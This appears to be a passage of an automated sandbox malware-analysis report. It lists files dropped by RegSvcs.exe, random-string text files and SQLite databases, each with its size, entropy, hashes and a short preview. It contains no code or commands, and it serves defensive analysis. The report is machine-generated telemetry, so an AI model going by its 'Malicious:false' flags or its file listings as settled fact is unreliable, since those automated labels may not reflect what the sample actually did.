                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.695685570184741
                                                                                Encrypted:false
                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                Malicious:false
                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.701757898321461
                                                                                Encrypted:false
                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                Malicious:false
                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.69156792375111
                                                                                Encrypted:false
                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                Malicious:false
                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.699434772658264
                                                                                Encrypted:false
                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                Malicious:false
                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.695685570184741
                                                                                Encrypted:false
                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                Malicious:false
                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.701757898321461
                                                                                Encrypted:false
                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                Malicious:false
                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.69156792375111
                                                                                Encrypted:false
                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                Malicious:false
                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):0.08235737944063153
                                                                                Encrypted:false
                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):0.08235737944063153
                                                                                Encrypted:false
                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
